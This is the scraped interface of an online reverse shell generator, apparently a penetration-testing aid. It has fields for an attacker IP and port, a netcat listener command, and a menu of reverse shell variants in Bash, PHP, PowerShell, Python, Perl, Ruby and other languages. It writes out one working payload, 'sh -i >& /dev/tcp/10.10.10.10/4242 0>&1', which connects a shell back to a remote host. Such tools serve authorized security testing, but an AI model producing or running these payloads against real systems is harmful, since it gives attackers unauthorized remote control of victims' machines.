Reverse Shell Generator
Step 1
: Configuration
IP
Port
+1
First 1024 ports generally require
root
privileges!
Advanced
Step 2
: Listener
$
nc -lvnp
4242
Type
nc
rlwrap + nc
socat
socat (TTY)
Copy
Advanced
Step 3
: Reverse shell
awk
Bash #1
Bash #2
nc #1
nc #2
Lua
Perl #1
Perl #2
PHP #1
PHP #2
PHP #3
PowerShell #1
PowerShell #2
PowerShell #3 (Base64)
Python #1
Python #2
Ruby #1
Ruby #2
socat #1
socat #2 (TTY)
telnet
$
sh
-i >& /dev/tcp/
10.10.10.10
/
4242
0>&1
Shell
sh
bash
ash
bsh
csh
ksh
zsh
pdksh
tcsh
Encoding
None
encodeURI
encodeURIComponent
Base64
Auto-copy
Copy
Copied to clipboard
Error copying to clipboard